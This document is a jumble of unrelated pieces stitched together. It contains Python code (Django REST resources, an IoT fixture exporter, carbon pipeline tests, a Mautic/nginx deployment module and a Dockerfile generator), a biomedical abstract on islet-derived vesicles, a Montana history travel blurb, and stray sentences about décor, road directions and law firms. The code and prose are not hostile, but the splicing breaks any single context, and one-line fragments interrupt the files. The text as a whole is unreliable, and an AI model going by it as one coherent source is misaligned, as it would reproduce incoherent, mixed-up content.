    # ^ Docstring displayed on API web-page as documentation

    model = Codebook

    @classmethod
    def get_url_pattern(cls):
        """The url pattern for use in the django urls routing table"""
        pattern = r'^{}$'.format(cls.get_view_name())
        return url(pattern, cls.as_view(), name=cls.get_view_name())

    @classmethod
    def get_view_name(cls):
        # Strips the trailing "Resource" (8 characters) from the class name.
        return cls.__name__[:-8].lower()

    @classmethod
    def get_model_name(cls):
        return "codebookhierarchy"

    @classmethod
    def get_tree(cls, codebook, include_labels=True, **kwargs):
        """Codebook.get_tree() with caching enabled"""
        # Pre-populate the codebook's code and label caches so building the
        # tree does not issue one query per node.
        codebook.cache()
        codebook.cache_labels()
        return tuple(_walk(codebook.get_tree(include_labels=include_labels, **kwargs)))

    def _get(self, request, *args, **kwargs):
        """Return the chained trees of all requested codebooks.

        NOTE(review): when too many codebooks are requested this returns a
        1-tuple containing an error string rather than raising APIException
        (imported above but unused) — confirm this is the intended contract.
        """
        qs = self.filter_queryset(self.get_queryset())
        if len(qs) > MAX_CODEBOOKS:
            return ("Please select at most {} codebook(s)".format(MAX_CODEBOOKS),)
        else:
            return itertools.chain.from_iterable(self.get_tree(codebook) for codebook in qs)

    def get(self, request, *args, **kwargs):
        """Wrap the hierarchy (or error tuple) in a DRF Response."""
        return Response(self._get(request, *args, **kwargs))


class CodebookResource(AmCATResource):
    # Plain model resource for codebooks; filterable by coding schema id.
    model = Codebook
    extra_filters = ["codingschemafield__codingschema__id"]


from amcat.models import Label
from api.rest.resources.amcatresource import AmCATResource


class LabelResource(AmCATResource):
    # Plain model resource for labels; filterable by the owning codebook id.
    model = Label
    extra_filters = ["code__codebook_codes__codebook__id"]
I chose gold accents and pops of blush and hot pink.
# -*- coding: utf-8 -*-
"""
:Autor: Adriano Leal
:Aluno: 11951
:email: l911911951@alunos.ipbeja.pt
"""
from django import template
from django.http.response import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext

from iot.models import Equipment, PhysicalCharacteristic, Voltage, Memory, \
    Microcontroller, Microcomputer, GPU, Interface, Processor, Sensor, Template


def _close_entry(fixture_file, remaining):
    """Write the object terminator: "},\\n" after every entry except the last."""
    if remaining > 1:
        fixture_file.write("},\n")
    else:
        fixture_file.write("}\n")


def criar(request):
    """Dump the IoT database tables to Django fixture files (.json).

    One file per model is written under ``iot/fixtures/``, hand-built in the
    Django fixture format (a JSON list of {"model", "pk", "fields"} objects).

    Fixes over the previous revision:
    - ``.encode("utf-8\\n")`` used an invalid codec name (the trailing newline
      makes the codec lookup fail with LookupError); corrected to ``"utf-8"``.
    - leftover debug ``print`` statements removed;
    - the dead, syntactically broken ``equipment`` loop in the Template
      section is now fully commented out;
    - the repeated entry-terminator logic is factored into ``_close_entry``.

    :param request: Django request (unused).
    :return: HttpResponse confirming the files were generated.
    """
    # --- Microcontroller -------------------------------------------------
    microcontrolador = Microcontroller.objects.filter()
    file_microcontroller = open("iot/fixtures/microcontroller.json", "w")
    file_microcontroller.write("[\n")
    qt = len(microcontrolador)
    for item in microcontrolador:
        file_microcontroller.write("\t{\n")
        file_microcontroller.write("\t\t\"model\": \"iot.Microcontroller\",\n")
        file_microcontroller.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
        file_microcontroller.write("\t\t\"fields\": {\n")
        file_microcontroller.write("\t\t\"type\" : \"" + item.type.encode("utf-8") + "\",\n")
        file_microcontroller.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
        file_microcontroller.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
        file_microcontroller.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
        file_microcontroller.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
        file_microcontroller.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
        file_microcontroller.write("\t}\n")
        _close_entry(file_microcontroller, qt)
        qt -= 1
    file_microcontroller.write("]\n")
    file_microcontroller.close()

    # --- Microcomputer (nullable FKs are emitted as JSON null) ------------
    microComputer = Microcomputer.objects.filter()
    file_microComputer = open("iot/fixtures/microComputer.json", "w")
    file_microComputer.write("[\n")
    qt = len(microComputer)
    for item in microComputer:
        file_microComputer.write("\t{\n")
        file_microComputer.write("\t\t\"model\": \"iot.Microcomputer\",\n")
        file_microComputer.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
        file_microComputer.write("\t\t\"fields\": {\n")
        file_microComputer.write("\t\t\"name\" : \"" + item.name.encode("utf-8") + "\",\n")
        file_microComputer.write("\t\t\"model\" : \"" + item.model.encode("utf-8") + "\",\n")
        if item.processor_id == None:
            file_microComputer.write("\t\t\"processor\" : null,\n")
        else:
            file_microComputer.write("\t\t\"processor\" : " + str(item.processor_id) + ",\n")
        if item.microcontroller_id == None:
            file_microComputer.write("\t\t\"microcontroller\" : null,\n")
        else:
            file_microComputer.write("\t\t\"microcontroller\" : " + str(item.microcontroller_id) + ",\n")
        if item.GPU_id == None:
            file_microComputer.write("\t\t\"GPU\" : null,\n")
        else:
            file_microComputer.write("\t\t\"GPU\" : " + str(item.GPU_id) + ",\n")
        if item.operatingSystems_id == None:
            file_microComputer.write("\t\t\"operatingSystems\" : null,\n")
        else:
            file_microComputer.write("\t\t\"operatingSystems\" : " + str(item.operatingSystems_id) + ",\n")
        file_microComputer.write("\t\t\"dateManufacture\" : \"" + str(item.dateManufacture) + "\",\n")
        file_microComputer.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
        file_microComputer.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
        file_microComputer.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
        file_microComputer.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
        file_microComputer.write("\t}\n")
        _close_entry(file_microComputer, qt)
        qt -= 1
    file_microComputer.write("]\n")
    file_microComputer.close()

    # --- PhysicalCharacteristic -------------------------------------------
    caracteristica = PhysicalCharacteristic.objects.filter()
    file_caracteristica = open("iot/fixtures/physicalCharacteristic.json", "w")
    file_caracteristica.write("[\n")
    qt = len(caracteristica)
    for item in caracteristica:
        file_caracteristica.write("\t{\n")
        file_caracteristica.write("\t\t\"model\": \"iot.PhysicalCharacteristic\",\n")
        file_caracteristica.write("\t\t\"pk\": " + str(item.id) + ",\n")
        file_caracteristica.write("\t\t\"fields\": {\n")
        file_caracteristica.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
        file_caracteristica.write("\t\t\"length\" : " + str(item.length) + ",\n")
        file_caracteristica.write("\t\t\"width\" : " + str(item.width) + ",\n")
        file_caracteristica.write("\t\t\"weight\" : " + str(item.weight) + "\n")
        file_caracteristica.write("\t}\n")
        _close_entry(file_caracteristica, qt)
        qt -= 1
    file_caracteristica.write("]\n")
    file_caracteristica.close()

    # --- GPU ---------------------------------------------------------------
    gpu = GPU.objects.filter()
    file_gpu = open("iot/fixtures/gpu.json", "w")
    file_gpu.write("[\n")
    qt = len(gpu)
    for item in gpu:
        file_gpu.write("\t{\n")
        file_gpu.write("\t\t\"model\": \"iot.GPU\",\n")
        file_gpu.write("\t\t\"pk\": " + str(item.id) + ",\n")
        file_gpu.write("\t\t\"fields\": {\n")
        file_gpu.write("\t\t\"type\" : \"" + item.type.encode("utf-8") + "\",\n")
        file_gpu.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
        file_gpu.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
        file_gpu.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
        file_gpu.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
        file_gpu.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
        file_gpu.write("\t}\n")
        _close_entry(file_gpu, qt)
        qt -= 1
    file_gpu.write("]\n")
    file_gpu.close()

    # --- Memory --------------------------------------------------------------
    memory = Memory.objects.filter()
    file_memory = open("iot/fixtures/memory.json", "w")
    file_memory.write("[\n")
    qt = len(memory)
    for item in memory:
        file_memory.write("\t{\n")
        file_memory.write("\t\t\"model\": \"iot.Memory\",\n")
        file_memory.write("\t\t\"pk\": " + str(item.id) + ",\n")
        file_memory.write("\t\t\"fields\": {\n")
        file_memory.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
        file_memory.write("\t\t\"RAM\" : \"" + str(item.RAM) + "\",\n")
        file_memory.write("\t\t\"SRAM\" : \"" + str(item.SRAM) + "\",\n")
        file_memory.write("\t\t\"EEPROM\" : \"" + str(item.EEPROM) + "\",\n")
        file_memory.write("\t\t\"flashMemory\" : \"" + str(item.flashMemory) + "\"\n")
        file_memory.write("\t}\n")
        _close_entry(file_memory, qt)
        qt -= 1
    file_memory.write("]\n")
    file_memory.close()

    # --- Voltage --------------------------------------------------------------
    voltage = Voltage.objects.filter()
    file_voltage = open("iot/fixtures/voltage.json", "w")
    file_voltage.write("[\n")
    qt = len(voltage)
    for item in voltage:
        file_voltage.write("\t{\n")
        file_voltage.write("\t\t\"model\": \"iot.Voltage\",\n")
        file_voltage.write("\t\t\"pk\": " + str(item.id) + ",\n")
        file_voltage.write("\t\t\"fields\": {\n")
        file_voltage.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
        file_voltage.write("\t\t\"operatingVoltage\" : " + str(item.operatingVoltage) + ",\n")
        file_voltage.write("\t\t\"inputVoltageRecommended\" : \"" + str(item.inputVoltageRecommended) + "\",\n")
        file_voltage.write("\t\t\"IOCurrentMax\" : \"" + str(item.IOCurrentMax) + "\",\n")
        file_voltage.write("\t\t\"DCCurrentfor3_3VPin\" : \"" + str(item.DCCurrentfor3_3VPin) + "\",\n")
        file_voltage.write("\t\t\"powerRatings\" : \"" + str(item.powerRatings) + "\",\n")
        file_voltage.write("\t\t\"powerSource\" : \"" + str(item.powerSource) + "\"\n")
        file_voltage.write("\t}\n")
        _close_entry(file_voltage, qt)
        qt -= 1
    file_voltage.write("]\n")
    file_voltage.close()

    # --- Interface --------------------------------------------------------------
    interface = Interface.objects.filter()
    file_interface = open("iot/fixtures/interface.json", "w")
    file_interface.write("[\n")
    qt = len(interface)
    for item in interface:
        file_interface.write("\t{\n")
        file_interface.write("\t\t\"model\": \"iot.Interface\",\n")
        file_interface.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
        file_interface.write("\t\t\"fields\": {\n")
        file_interface.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
        file_interface.write("\t\t\"hdmi\" : \"" + item.hdmi.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"videoInput\" : \"" + item.videoInput.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"videoOutputs\" : \"" + item.videoOutputs.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"audioInputs\" : \"" + item.audioInputs.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"audioOutputs\" : \"" + item.audioOutputs.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"storage\" : \"" + item.storage.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"network\" : \"" + item.network.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"wifi\" : \"" + item.wifi.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"jack\" : \"" + item.jack.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"GPIO\" : \"" + item.GPIO.encode("utf-8") + "\",\n")
        file_interface.write("\t\t\"digitalIOPins\" : " + str(item.digitalIOPins) + ",\n")
        file_interface.write("\t\t\"analogInputPins\" : " + str(item.analogInputPins) + "\n")
        file_interface.write("\t}\n")
        _close_entry(file_interface, qt)
        qt -= 1
    file_interface.write("]\n")
    file_interface.close()

    # --- Processor --------------------------------------------------------------
    processor = Processor.objects.filter()
    file_processor = open("iot/fixtures/processor.json", "w")
    file_processor.write("[\n")
    qt = len(processor)
    for item in processor:
        file_processor.write("\t{\n")
        file_processor.write("\t\t\"model\": \"iot.Processor\",\n")
        file_processor.write("\t\t\"pk\": " + str(item.id) + ",\n")
        file_processor.write("\t\t\"fields\": {\n")
        file_processor.write("\t\t\"type\" : \"" + item.type.encode("utf-8") + "\",\n")
        file_processor.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
        file_processor.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
        file_processor.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
        file_processor.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
        file_processor.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
        file_processor.write("\t}\n")
        _close_entry(file_processor, qt)
        qt -= 1
    file_processor.write("]\n")
    file_processor.close()

    # --- Sensor --------------------------------------------------------------
    sensor = Sensor.objects.filter()
    file_sensor = open("iot/fixtures/sensor.json", "w")
    file_sensor.write("[\n")
    qt = len(sensor)
    for item in sensor:
        file_sensor.write("\t{\n")
        file_sensor.write("\t\t\"model\": \"iot.Sensor\",\n")
        file_sensor.write("\t\t\"pk\": " + str(item.id) + ",\n")
        file_sensor.write("\t\t\"fields\": {\n")
        file_sensor.write("\t\t\"name\" : \"" + item.name.encode("utf-8") + "\",\n")
        file_sensor.write("\t\t\"serialNumber\" : \"" + item.serialNumber.encode("utf-8") + "\",\n")
        file_sensor.write("\t\t\"model\" : \"" + item.model.encode("utf-8") + "\",\n")
        file_sensor.write("\t\t\"function\" : \"" + item.function.encode("utf-8") + "\"\n")
        file_sensor.write("\t}\n")
        _close_entry(file_sensor, qt)
        qt -= 1
    file_sensor.write("]\n")
    file_sensor.close()

    # --- Template --------------------------------------------------------------
    template = Template.objects.filter()
    file_template = open("iot/fixtures/template.json", "w")
    file_template.write("[\n")
    qt = len(template)
    for item in template:
        file_template.write("\t{\n")
        file_template.write("\t\t\"model\": \"iot.Template\",\n")
        file_template.write("\t\t\"pk\": " + str(item.id) + ",\n")
        file_template.write("\t\t\"fields\": {\n")
        file_template.write("\t\t\"name\" : \"" + item.name.encode("utf-8") + "\",\n")
        file_template.write("\t\t\"imagePath\" : \"" + item.imagePath.encode("utf-8") + "\"\n")
        # TODO: the many-to-many "equipment" relation is not serialized yet.
        # The previous (broken) draft looked like:
        # for i in template:
        #     for j in i.equipment.all():
        #         file_template.write("\t\t\"equipment\" : " + str(j.id) + ",\n")
        file_template.write("\t}\n")
        _close_entry(file_template, qt)
        qt -= 1
    file_template.write("]\n")
    file_template.close()

    return HttpResponse("Ficheiros gerados com sucesso!\n")
Left on CR-87 S, which turns into CR-12 W, for 1.5 miles until it dead-ends. Right on CR-22 for 9.6 miles until it dead-ends.
from mock import Mock, patch
from unittest import TestCase

from carbon import events, state
from carbon.pipeline import Processor, run_pipeline
from carbon.service import CarbonRootService, setupPipeline
from carbon.tests.util import TestSettings


class TestSetupPipeline(TestCase):
    """Tests for ``carbon.service.setupPipeline``.

    Verifies that the pipeline hook is chained onto the metric events,
    that each named processor triggers its setup helper, and that the
    pipeline-ready callback is scheduled on the reactor.
    """

    def setUp(self):
        self.settings = TestSettings()
        self.root_service_mock = Mock(CarbonRootService)
        # Patch the reactor entry point so no real event loop is needed.
        self.call_when_running_patch = patch('twisted.internet.reactor.callWhenRunning')
        self.call_when_running_mock = self.call_when_running_patch.start()

    def tearDown(self):
        self.call_when_running_patch.stop()
        # setupPipeline mutates module-level state; reset it so each test
        # starts from a clean slate.
        state.pipeline_processors = []
        events.metricReceived.handlers = []
        events.metricGenerated.handlers = []

    def test_run_pipeline_chained_to_metric_received(self):
        setupPipeline([], self.root_service_mock, self.settings)
        self.assertTrue(run_pipeline in events.metricReceived.handlers)

    def test_run_pipeline_chained_to_metric_generated(self):
        setupPipeline([], self.root_service_mock, self.settings)
        self.assertTrue(run_pipeline in events.metricGenerated.handlers)

    @patch('carbon.service.setupAggregatorProcessor')
    def test_aggregate_processor_set_up(self, setup_mock):
        setupPipeline(['aggregate'], self.root_service_mock, self.settings)
        setup_mock.assert_called_once_with(self.root_service_mock, self.settings)

    @patch('carbon.service.setupRewriterProcessor')
    def test_rewrite_processor_set_up(self, setup_mock):
        setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings)
        setup_mock.assert_called_once_with(self.root_service_mock, self.settings)

    @patch('carbon.service.setupRelayProcessor')
    def test_relay_processor_set_up(self, setup_mock):
        setupPipeline(['relay'], self.root_service_mock, self.settings)
        setup_mock.assert_called_once_with(self.root_service_mock, self.settings)

    @patch('carbon.service.setupWriterProcessor')
    def test_write_processor_set_up(self, setup_mock):
        setupPipeline(['write'], self.root_service_mock, self.settings)
        setup_mock.assert_called_once_with(self.root_service_mock, self.settings)

    def test_unknown_processor_raises_value_error(self):
        # Use the builtin ValueError directly: the Python 2-only
        # `exceptions` module (previously imported here) does not exist on
        # Python 3, and the builtin is identical on both versions.
        self.assertRaises(
            ValueError, setupPipeline, ['foo'], self.root_service_mock, self.settings)

    @patch('carbon.service.setupRewriterProcessor', new=Mock())
    def test_parses_processor_args(self):
        # XXX Patch doesn't work on this import directly, so register the
        # mock in the plugin registry by hand.
        rewrite_mock = Mock()
        Processor.plugins['rewrite'] = rewrite_mock
        setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings)
        rewrite_mock.assert_called_once_with('pre')

    def test_schedules_pipeline_ready(self):
        setupPipeline([], self.root_service_mock, self.settings)
        self.assertTrue(self.call_when_running_mock.called)
It has been suggested that extracellular vesicles (EVs) can mediate crosstalk between hormones and metabolites within pancreatic tissue. However, the possible effect of pancreatic EVs on stem cell differentiation into pancreatic lineages remains unknown. Herein, human islet-derived EVs (h-Islet-EVs) were isolated, characterized and subsequently added to human induced pluripotent stem cell (iPSC) clusters during pancreatic differentiation. The h-islet-EVs had a mean size of 117±7 nm and showed positive expression of CD63 and CD81 EV markers as measured by ELISA. The presence of key pancreatic transcription factor mRNA, such as NGN3, MAFA and PDX1, and pancreatic hormone proteins such as C-peptide and glucagon, were confirmed in h-Islet-EVs. iPSC clusters were differentiated in suspension and at the end stages of the differentiation protocol, the mRNA expression of the main pancreatic transcription factors and pancreatic hormones was increased. H-Islet-EVs were supplemented to the iPSC clusters in the later stages of differentiation. It was observed that h-Islet-EVs were able to up-regulate the intracellular levels of C-peptide in iPSC clusters in a concentration-dependent manner. The effect of h-Islet-EVs on the differentiation of iPSC clusters cultured in 3D-collagen hydrogels was also assessed. Although increased mRNA expression for pancreatic markers was observed when culturing the iPSC clusters in 3D-collagen hydrogels, delivery of EVs did not affect the insulin or C-peptide intracellular content. Our results provide new information on the role of h-Islet-EVs in the regulation of insulin expression in differentiating iPSC clusters, and are highly relevant for pancreatic tissue engineering applications.
""" Some Main Functions """ ### INCLUDES ### import os import bottle import logging from tornado import ioloop from .common import CWD, TPL_FOLDER, OPTIONS_PARSER from .system import SystemSettings from .web import WebServer from .web.socket import WebsocketManager from .sleepy_mesh import SleepyMeshManager ### CONSTANTS ### AES_RESET_DELAY = 3.0 # seconds ### MAIN FUNCTION ### def main(system_options): """ Main function """ # Make some variables accessible to html templates global manager, system_settings, pages, users, snmp_agents, snmp_commands, snmp_traps # Set current working directory os.chdir(CWD) # print('CWD: {}'.format(CWD)) # Set default logging across all modules logging.basicConfig(level=logging.ERROR) # Set default bottle Template Path # del bottle.TEMPLATE_PATH[:] bottle.TEMPLATE_PATH.append(TPL_FOLDER) # Create and start Sleepy Mesh Manager (System Settings start modbus if it is enable) system_settings = SystemSettings(system_options) manager = SleepyMeshManager( system_settings=system_settings, websocket=WebsocketManager(), snmp_websocket=WebsocketManager() ) manager.start() # Forward SNMP Agents/Commands/Traps to templates snmp_agents = manager.snmp_server.agents snmp_commands = manager.snmp_server.commands snmp_traps = manager.snmp_server.traps # Create Web Server # Web server is a loop, sleepy mesh manager scheduler is based on the same loop as well web_server = WebServer(manager) # Share some variables with html templates variables pages = web_server.pages users = web_server.pages.users # Start Web Server web_server.start() # If we are here it means that program has been terminated, kill modbus server manager.modbus_server.stop() manager.snmp_server.stop() def reset_aes_settings(reset_complete_callback=None): """ Reset AES settings (if needed) """ global manager # Set current working directory os.chdir(CWD) # print('CWD: {}'.format(CWD)) # Set default logging across all modules logging.basicConfig(level=logging.ERROR) # Create System Options 
(system_options, args) = OPTIONS_PARSER.parse_args() # Disable modbus and snmp servers system_options.modbus_enable = False system_options.snmp_enable = False # Create and start Sleepy Mesh Manager system_settings = SystemSettings(system_options) manager = SleepyMeshManager( system_settings=system_settings, websocket=WebsocketManager(), snmp_websocket=WebsocketManager() ) # Dynamically creating AES reset function so we can incorporate delay def _aes_reset(): """ Nested AES Reset """ # Dynamically creating reset complete callback def _reset_complete_callback(): """ Nested Reset Complete Callback """ # Stopping Scheduler manager.stop_scheduler() # Stopping Tornado Server ioloop.IOLoop.instance().stop() if reset_complete_callback is not None: reset_complete_callback() manager.reset_network(complete_callback=_reset_complete_callback) # Monkey Patching Scheduler old_start_scheduler = manager.init_scheduler def monkey_patched_init_scheduler(): """ Monkey patching Init Scheduler to include AES Reset """ old_start_scheduler() manager.bridge.schedule(AES_RESET_DELAY, _aes_reset) manager.init_scheduler = monkey_patched_init_scheduler # Delete all active nodes nodes = manager.platforms.select_nodes('active').values() for node in nodes: manager.platforms.delete_node(node) node.delete() # Starting Scheduler manager.start() # Starting Tornado ioloop.IOLoop.instance().start()
Little Bighorn Battlefield National Monument memorializes the site of the Battle of the Little Bighorn, which took place on June 25-26, 1876. Explore the majestic landscape of this dramatic canyon. Experience the history these canyon walls hold. Step back in time to the era of the Fur Trade. This trading post on the upper Missouri has been preserved to look and feel like a hub for fur traders, explorers, and early settlers. This ranch used to be home to a 10 million acre cattle empire. Now, it commemorates the role of cattlemen in American history. Grab a pair of cowboy boots and experience the ranch life. Follow along the Missouri River to discover Lewis and Clark’s quest to find the Northwest Passage. See all the landmarks famous to their journey in Montana from the Gates of the Mountains to Pompey’s Pillar. The Nez Perce (Nimíipuu or Nee-Me-Poo) National Historic Trail passes through Montana and finds its end at the Bear Paw Battlefield near Chinook, Montana. This trail memorializes the flight of the Nez Perce from their homeland. Brian D'Ambrosio lives in Helena, Montana. He has written more than 500 articles for publications as diverse as USA Today, High Country News, Sunset, The Smithsonian, and Backpacker Magazine. One of his most recent books, "Life in the Trenches," examined the complicated, rugged lives of legendary boxers, entertainment wrestlers, 1980s actors and contemporary musicians, and earned an independent book publishing award for nonfiction.
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron
# Copyright 2015, TODAY Clouder SASU
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License with Attribution
# clause as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License with
# Attribution clause along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
##############################################################################

from openerp import models, api, modules


class ClouderContainer(models.Model):
    """
    Add methods to manage the mautic specificities.

    Extends the generic container deployment with a post-deploy hook that
    downloads and unpacks the Mautic release archive into the container.
    """

    _inherit = 'clouder.container'

    @api.multi
    def deploy_post(self):
        # Run the generic post-deploy steps first, then add the
        # mautic-specific installation for containers of that type.
        super(ClouderContainer, self).deploy_post()
        if self.application_id.type_id.name == 'mautic':
            # Archive name is derived from the image version,
            # e.g. "2.1.0.zip".
            package_name = self.image_id.current_version + '.zip'
            # Download the release archive into the web root as the
            # web-server user.
            self.execute(
                ['wget', '-q',
                 'https://s3.amazonaws.com/mautic/releases/' + package_name,
                 ], path='/var/www/', username='www-data')
            # Unpack in place and remove the archive afterwards.
            self.execute(['unzip', package_name],
                         path='/var/www', username='www-data')
            self.execute(['rm', package_name],
                         path='/var/www', username='www-data')
            #INSTALLATION FROM SOURCE
            # self.execute(
            #     ['git', 'clone', '--branch', self.image_id.current_version,
            #      'https://github.com/mautic/mautic.git'
            #      ], path='/var/www/', username='www-data')
            # self.execute(
            #     ['composer', 'install'],
            #     path='/var/www/mautic', username='www-data')


class ClouderBase(models.Model):
    """
    Add methods to manage the mautic specificities.

    Hooks base deployment/purge to create and remove the nginx virtual
    host for a mautic base.
    """

    _inherit = 'clouder.base'

    @api.multi
    def deploy_build(self):
        """
        Configure nginx.

        Installs the bundled nginx site template, substitutes the base
        name and domain into it, enables the site and reloads nginx.
        Returns whatever the parent implementation returns.
        """
        res = super(ClouderBase, self).deploy_build()
        if self.application_id.type_id.name == 'mautic':
            config_file = '/etc/nginx/sites-available/' + self.fullname
            # Copy the template shipped with this module into the container.
            self.container_id.send(
                modules.get_module_path('clouder_template_mautic') +
                '/res/nginx.config', config_file)
            # Substitute placeholders in the template with the real
            # base name and domain.
            self.container_id.execute(['sed', '-i', '"s/BASE/' + self.name + '/g"',
                                       config_file])
            self.container_id.execute(['sed', '-i',
                                       '"s/DOMAIN/' + self.domain_id.name + '/g"',
                                       config_file])
            # Enable the site and apply the new configuration.
            self.container_id.execute(['ln', '-s',
                                       '/etc/nginx/sites-available/' + self.fullname,
                                       '/etc/nginx/sites-enabled/' + self.fullname])
            self.container_id.execute(['/etc/init.d/nginx', 'reload'])
        return res

    @api.multi
    def purge_post(self):
        """
        Purge from nginx configuration.

        Removes both the enabled symlink and the available site file,
        then reloads nginx.
        """
        super(ClouderBase, self).purge_post()
        if self.application_id.type_id.name == 'mautic':
            self.container_id.execute(['rm', '-rf',
                                       '/etc/nginx/sites-enabled/' + self.fullname])
            self.container_id.execute([
                'rm', '-rf',
                '/etc/nginx/sites-available/' + self.fullname])
            self.container_id.execute(['/etc/init.d/nginx', 'reload'])
93. Dylewski & Associates P.C. 102. The Law Office of Terisa Taylor, P.C.
#!/usr/bin/python

import argparse
import docker
import json
import logging
import os
import shutil
import sys

logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO)


class zbuilder():
    """Parse a JSON build configuration and generate one Dockerfile per
    (source, base image) pair; ``run`` then builds those images via the
    local docker daemon.
    """

    def __init__(self, config):
        """Parse *config* (an open file containing the JSON build spec)
        and generate the Dockerfiles, recording their names in
        ``self.docker_files``.
        """
        js = json.load(config)
        self.docker_files = []
        # Marker created inside the image when the build commands succeed;
        # the post-build success/fail steps test for it.
        self.build_succeeded_file = "/tmp/build_succeeded"
        packages = js.get("packages")
        if not packages:
            logging.error("core: there is no 'packages' object, nothing to build")
            return
        logging.info("Starting parse different build types")
        for package_type, package in packages.items():
            # Base images for this package type.
            images = []
            if package_type == "deb":
                img = js.get("deb-images")
                if img:
                    images += img
            elif package_type == "rpm":
                img = js.get("rpm-images")
                if img:
                    images += img
            else:
                logging.error("%s: unsupported package type", package_type)
                continue

            logging.info("%s: starting to parse commands", package_type)
            pre_build_commands = package.get("pre-build-commands")
            build_commands = package.get("build-commands")
            if build_commands:
                build_commands.append("echo success > %s" % (self.build_succeeded_file))

            post_build = package.get("post-build-commands")
            final_commands = {}
            if post_build:
                pbs = post_build.get("success")
                if pbs:
                    final_commands["success"] = pbs
                pbf = post_build.get("fail")
                if pbf:
                    final_commands["fail"] = pbf
                pba = post_build.get("always")
                if pba:
                    final_commands["always"] = pba

            sources = package.get("sources")
            if not sources:
                logging.error("%s: there is no 'sources' object, nothing to build", package_type)
                break

            for name, source in sources.items():
                logging.info("%s/%s: starting to parse source", package_type, name)
                # BUG FIX: work on per-source copies. The previous code
                # mutated the shared `images` and `build_commands` lists,
                # so one source's include-images and `cd <name>` leaked
                # into every subsequent source of the same package.
                source_images = list(images)
                include_images = source.get("include-images")
                if include_images:
                    source_images += include_images
                exclude_images = source.get("exclude-images")
                if exclude_images:
                    source_images = [x for x in source_images if x not in exclude_images]
                logging.info("%s/%s: images: %s", package_type, name, ', '.join(source_images))

                fetch_commands = []
                source_build_commands = list(build_commands) if build_commands else []
                try:
                    stype = source["type"]
                    repo = source["repository"]
                    branch = source.get("branch", "master")
                    if stype == "git":
                        fetch_commands.append("rm -rf %s" % (name))
                        fetch_commands.append("git clone %s %s" % (repo, name))
                        fetch_commands.append("cd %s" % (name))
                        fetch_commands.append("git checkout %s" % (branch))
                        # BUG FIX: each Dockerfile RUN starts a fresh shell,
                        # so the build step must cd into the checkout first.
                        # The old code appended this *after* the build
                        # commands (and after the success marker), running
                        # the build in the wrong directory.
                        source_build_commands.insert(0, "cd %s" % (name))
                    else:
                        logging.error("%s/%s: unsupported source type '%s'",
                                      package_type, name, stype)
                        continue
                except Exception as e:
                    # Missing "type"/"repository" keys end up here.
                    logging.error("%s/%s: invalid source: %s", package_type, name, e)
                    continue
                logging.info("%s/%s: fetch commands: %s",
                             package_type, name, ', '.join(fetch_commands))

                # Keep only non-empty command sets: a missing set would
                # otherwise produce an invalid bare RUN line (or crash on
                # None). This also removes the dead try/except that called
                # the nonexistent logging.notice().
                commands = [cmd_set
                            for cmd_set in (pre_build_commands,
                                            fetch_commands,
                                            source_build_commands)
                            if cmd_set]

                for image in source_images:
                    df = self.generate_dockerfile(name, image, commands, final_commands)
                    self.docker_files.append(df)

    def generate_dockerfile(self, name, image, commands, final_commands):
        """Write ``Dockerfile.<name>.<image>`` and return its filename.

        *commands* is a list of command sets; each set becomes one RUN
        line. *final_commands* may hold "success"/"fail"/"always" sets
        which run conditionally on the build-succeeded marker.
        """
        df = "Dockerfile.%s.%s" % (name, image)
        with open(df, 'w+') as f:
            f.write("FROM %s\n" % (image))
            f.write("ENV ZBUILDER_IMAGE=%s ZBUILDER_NAME=%s DEBIAN_FRONTEND=noninteractive\n"
                    % (image, name))
            f.write("ADD conf.d conf.d\n")
